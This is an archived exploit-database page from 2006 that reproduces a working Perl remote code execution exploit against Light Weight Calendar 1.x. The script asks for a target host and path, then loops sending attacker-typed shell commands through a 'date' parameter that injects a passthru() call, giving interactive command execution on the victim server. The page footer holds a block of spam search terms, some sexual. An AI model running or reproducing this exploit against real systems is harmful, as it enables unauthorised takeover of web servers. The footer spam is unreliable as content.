about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Light Weight Calendar 1.x (date) Remote Code Execution Vulnerability



2006-03-09 Light Weight Calendar 1.x (date) Remote Code Execution Vulnerability
Rated as : Low Risk

#!/usr/bin/perl
#
# Light Weight Calendar
# Exploit by Hessam-x (www.hessamx.net)
#
######################################################
#  ___ ___                __                         #
# /   |   \_____    ____ |  | __ ___________________ #
#/    ~    \__  \ _/ ___\|  |/ // __ \_  __ \___   / #
#\    Y    // __ \\  \___|    <\  ___/|  | \//    /  #
# \___|_  /(____  /\___  >__|_ \\___  >__|  /_____ \ #
#       \/      \/     \/     \/    \/            \/ #
#             Iran Hackerz Security Team             #
#               WebSite: www.hackerz.ir              #
#                                                    #
######################################################
# Name    : Light Weight Calendar                    #
# version : 1.*                                      #
######################################################
use LWP::Simple;

print "-------------------------------------------\n";
print "=          Light Weight Calendar          =\n";
print "=       By Hessam-x  - www.hackerz.ir     =\n";
print "-------------------------------------------\n\n";

      print "Target(www.example.com)\> ";
      chomp($targ = <STDIN>);

      print "path: (/lwc/)\>";
      chomp($path=<STDIN>);

while()
{

     print "command:\>";
     chomp($comd=<STDIN>);
    
$expl="index.php?hx=".$comd."&date=passthru%28%24_GET%5Bhx%5D%29";
     $page=get("http://".$targ.$path.$expl) || die "[-]
Exploit failed ...\n";

}
securitydot.net - 2006-03-09

Advertising

Copyright 2007, SecurityDot
Sat, 22 Nov 2008 14:23:50 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
dogsex Download s shreya sex log m...2Fgrz_ all cartoo Vidio.sek. news for c www.batle HACKED BY Www.sextv gay foto WWW.TRISHA flim.sex games.com PHPexplore Www.Bollyw WWW.TRISHA gay foto news for c News Searc WWW.SEXX.C CMS is Fre t570t lo16l taki t766t t96t +free+sexv www.9aimy. Wx.Sexape. Vidio.sek. www,com89 php-nuke 2 toni .netnuke PunBB 1.2. auction CMS is Fre t479t t479t jogos de s wild sex v news for c News Searc www.sesygi Www.tamilg CMS is Fre panty PORNOINDON